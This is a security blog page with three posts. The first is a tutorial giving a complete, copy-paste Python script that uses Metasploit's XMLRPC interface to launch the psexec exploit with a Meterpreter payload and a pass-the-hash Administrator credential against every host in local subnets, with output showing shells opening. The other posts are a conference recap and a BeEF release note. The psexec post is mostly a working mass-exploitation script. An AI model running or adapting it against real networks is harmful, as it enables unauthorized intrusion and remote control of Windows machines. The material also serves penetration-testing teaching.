Blog.HappyPacket.net

Security Notes, News, and Thoughts

PSExec Scanner via Metasploit XMLRPC

I was inspired by Jabra's excellent post on creating a PSExec scanner with Metasploit and Perl to demonstrate how this same thing could be done locally or remotely using XMLRPC. The original post by Jabra is also a good way to do this, and can be found here: http://spl0it.wordpress.com/2009/12/17/metasploit-psexec-scanner-via-perl/

Python and libxmlrpc make an easy way to accomplish this task. To start with, we need to start Metasploit up on our host system and start the xmlrpc module

sussurro@msfdev:~/metasploit$ ./msfconsole

# # ###### ##### ## #### ##### # #### # #####
## ## # # # # # # # # # # # #
# ## # ##### # # # #### # # # # # # #
# # # # ###### # ##### # # # # #
# # # # # # # # # # # # # #
# # ###### # # # #### # ###### #### # #


=[ metasploit v3.3.3-dev [core:3.3 api:1.0]
+ -- --=[ 305 exploits - 67 auxiliary
+ -- --=[ 171 payloads - 20 encoders - 6 nops
=[ svn r7908 updated today (2009.12.17)

msf > load xmlrpc Pass=abc123 ServerType=Web
[*] XMLRPC Service: 127.0.0.1:55553
[*] XMLRPC Username: msf
[*] XMLRPC Password: abc123
[*] XMLRPC Server Type: Web
[*] XMLRPC Web URI: /RPC2
[*] Successfully loaded plugin: xmlrpc
msf >
After we have XMLRPC loaded, then we can get down to some python programming.

The assumption is, much like with Jabra's program, that we are going to be scanning 2 networks, the 192.168.1.X and the 2.X networks. The first thing we need to do is get authenticated into Metasploit.
user = "msf"
password = "abc123"
token = ""

msf = xmlrpclib.ServerProxy("http://localhost:55553/RPC2")
auth = msf.auth.login(user,password)

if auth["result"] == "success" :
token = auth["token"]
else:
exit("Login failed, try again\n")

We setup our username, msf, and our super secret password of abc123 first, and then we use the xmlrpclib library to connect to our Metasploit server. Once we are connected, the msf object holds our connection information.

When we are connected, the first thing we need to do is authenticate so that we get an authentication token. The authentication token is required for all future actions unless your session goes idle. We authenticate with the "auth.login" method and the object we get back contains our token.

Next we need to call our actual exploit, to do this we create a small function to make the calls a little bit more clear.

def callSploit(ip):
ret = msf.module.execute(token,"exploit","windows/smb/psexec",
{
"RHOST" : ip,
"PAYLOAD" : "windows/meterpreter/bind_tcp",
"SMBUser" : "Administrator",
"SMBPass" : "LM:NTLM HASH" })
if ret["result"] != "success" :
print "Exploit failed for " + ip + "\n"

We have defined a function called callSploit which takes an IP address. We are asking our Metasploit connection to launch the module.execute function, specifying our authentication token, the type of module we are calling (exploit) and the module itself that we will be using. The final argument is all of the arguments that we would traditionally pass inside the Metasploit console. Once we launch the exploit, we get back a result object, and a result of success means that the request was valid. While the requests are launching, we can see the sessions popping up in the Metasploit console and can interact with them one at a time.

The next stage in our program is to do the actual call of our new function:
for net in range(1,2):
for ip in range(1,254):
callSploit("192.168." + str(net) +"."+ str(ip))
time.sleep(1)


print "DONE.. check for shells"
Here we have just went through the 192.168.1 and .2 range and the list of IP addresses valid for each submit and executed our callSploit function. The jobs will be running quickly, however if you look inside msfconsole and type in "jobs" repeatedly you should see

msf > jobs

Jobs
====

Id Name
-- ----
2 Exploit: windows/smb/psexec

Finally, once you have a host that works you will hopefully see

[*] Meterpreter session 4 opened (192.168.1.5:36435 -> 192.168.1.44:4444)
[*] Meterpreter session 5 opened (192.168.1.5:43357 -> 192.168.1.130:4444)
[*] Meterpreter session 6 opened (192.168.1.5:48619 -> 192.168.2.3:4444)


To get Metasploit, go over to http://www.metasploit.com
Jabra's blog is a great read: http://spl0it.wordpress.com

Here is the script in easier copy and paste form:
#!/usr/bin/python

import xmlrpclib
import time

user = "msf"
password = "abc123"
token = ""

msf = xmlrpclib.ServerProxy("http://localhost:55553/RPC2")
auth = msf.auth.login(user,password)

if auth["result"] == "success" :
token = auth["token"]
else:
exit("Login failed, try again\n")

def callSploit(ip):
ret = msf.module.execute(token,"exploit","windows/smb/psexec",
{
"RHOST" : ip,
"PAYLOAD" : "windows/meterpreter/bind_tcp",
"SMBUser" : "Administrator",
"SMBPass" : "LM:NTLM HASH" })
if ret["result"] != "success" :
print "Exploit failed for " + ip + "\n"

for net in range(1,2):
for ip in range(1,254):
callSploit("192.168." + str(net) +"."+ str(ip))
time.sleep(1)


print "DONE.. check for shells"


Thoughts on SecTor

Last week I had the opportunity to speak at SecTor: Canada's Premier IT Security Conference. I had heard positive feedback regarding the conference from previous years and as the conference is only in its 3rd year the number of attendees was impressive. I have attended a number of other conferences in the past year including ShmooCon, BlackHat and Defcon and I thought that the organization of this conference was impressive. For being a new conference I thought that SecTor had a great lineup of speakers, quality vendors, and some great keynotes.

From a speaker's prospective, my first communications with the SecTor team came during the Call For Papers(CFP) stage. Brian Bourne, the primary face of SecTor, was very responsive through this process and once I had been notified that I had been accepted to speak the rest of the planning started. Nanna Ng initiated the trip planning process and guided me through all the steps needed to get plane and hotel reservations handled. SecTor takes excellent care of their speakers. I was amazed at the extent they went to in order to make my trip painless.

SecTor had handled the booking for both airlines and hotel, so once I had all my presentation materials in, all I had to do was show up at the airport. After landing in Toronto there was a car waiting for me to take me to the hotel, where I was checked in without incident. The accommodations at the InterContinental hotel were great and it was attached to the conference center so it was just a short walk from the hotel room to the conference area. The SecTor team had worked to make sure that the travel was painless and the experience that they created for the speakers was amazing.

The conference itself started on Tuesday although there was some training on Monday. After some opening remarks by Brian, Chris Hoff delivered a great keynote on Cloud Computing. Chris is a great speaker and brought forth a ton of information on "the cloud" in an easy to understand way and really made all of the information mesh.

Following the keynotes the sessions started. The first session I attended was "When Web 2.0 Attacks - Understanding AJAX, Flash and "Highly Interactive Technology" by Rafal Los. Rafal is a great speaker and had some good information on some of the vulnerabilities that Web 2.0 present when implemented poorly and had some great points on how many of the old vulnerabilities that we thought had been dealt with are re-emerging in Web 2.0. I really enjoyed this talk.

Andrew Nash from PayPal delivered a lunch keynote. While this was my least favorite keynote, there was good information on identity management. Mr Nash is a good speaker, unfortunately I am not sure that it was as relevant to as many people at the conference. I thought it was interesting to hear some of what PayPal was doing, but there was no real link into how anyone else can leverage the resources or how the information pertained to us aside from that PayPal is working hard to protect our information.

The afternoon sessions were great. After lunch I headed over to see Jennifer Jabbusch's talk "Retaliation: Breaking Attack Vectors in the Infrastructure". She did a great job of explaining emerging threats on the network and what the latest standards are doing to help protect layers 2 and 3 in the network.

The next talk that I went to was by Robert Hansen (RSnake) on ""Consumerization and Future State of Information Warfare". Robert focused on where information warfare is heading and how the technology used by attackers has grown to the point where we are likely to see automated identities formed soon where automated applications role play a part in order to bring people in to their social media circle where the typical spam and malware will be distributed sparingly between meaningful information. Overall a really informative talk although the findings of his research were a little disheartening as it is obvious that the attackers are moving quickly and are very agile.

That evening was a reception and speakers dinner at Joe Badalis. I thought that this was hugely successful. I met some great people and had a chance to talk with both attendees and other speakers and it was overall a great time. The dinner that followed the reception was great and I had some awesome discussions with the other folks at the table. This was a great experience and I hope they keep this for future years.

There was no keynote on Wednesday morning and we instead went directly into talks. I attended Andrés Riancho two talks on the w3af framework. These talks took up the whole morning but the time was well spent. I learned much more about the w3af framework and where it is headed.
Andrés gave great demos and examples of everything from how to do a scan to how to write your own module. He even included some information about how w3af handles web scanning compared to other vendors. Andrés offers w3af training in case anyone is interested, so check it out if you want to know more about the w3af framework.

The lunch keynote was by Adam Laurie known as Major Malfunction. The title was "A day in the life of a hacker.." and covered some great stuff on hardware hacking. He was very engaging as a speaker and even included technical examples during the keynote which seems to be very rare. He went in-depth into how the biometric passports work and exposed some of the scarier sides of the technology that you don't normally get to see.

The rest of the day I was presenting. My first talk on Nsploit went ok, although it wasn't an overwhelming success. I'm not sure if it was the post lunch coma, if the talk was too technical, or if it was just boring but I didn't get a lot of interaction during the talk. I did get a lot of good questions after the talk though so that was nice. The second talk on BeEF seemed to go well with great interaction, some awesome questions, and people seemed to be much more into it. Overall it was a good experience but I may need to tweak the Nsploit talk if I do it again.

The conference finished with some closing remarks from Brian again. The vendor drawings were held and folks got their toys, and then a few of us went out for Mexican across the street for some more networking. Overall I got to meet some great people, hear some awesome talks, and had a great experience thanks to the organizers of SecTor. I hope that I get to attend next year, whether as a presenter again or as an attendee I know that I will enjoy it.

Thanks again to all the organizers of SecTor for making the trip memorable in a positive way. Hope to see everyone again next year.




BeEF injection with Metasploit Payloads

Wade Alcorn has released the latest version of the Browser Exploit Framework or BeEF for short. This version has some new features in it, including the code that I worked on for the Security BSides presentation. I encourage you to go over to http://www.bindshell.net and download the latest version of BeEF and try it out. If you don't know how to get started, download the Samurai WTF distribution at http://samurai.inguardians.com and then head over to http://www.ethicalhacker.net where I have done some videos on how to upgrade to the latest version of BeEF and also demonstrated 2 of the new features. In addition to some of the features I added, Jabra and RSnake also have some new code in. The vimeo videos are linked on http://www.ethicalhacker.net as well.

I'm going to be updating my blog more frequently, but feel free to follow me on Twitter as @sussurro and I'll be posting updates there as well.

Thanks again to Wade Alcorn for incorporating and also cleaning up my code for the distribution, he has been great to work with. Thanks also go to H D Moore of the Metasploit project for incorporating my Metasploit changes which allow all this to work.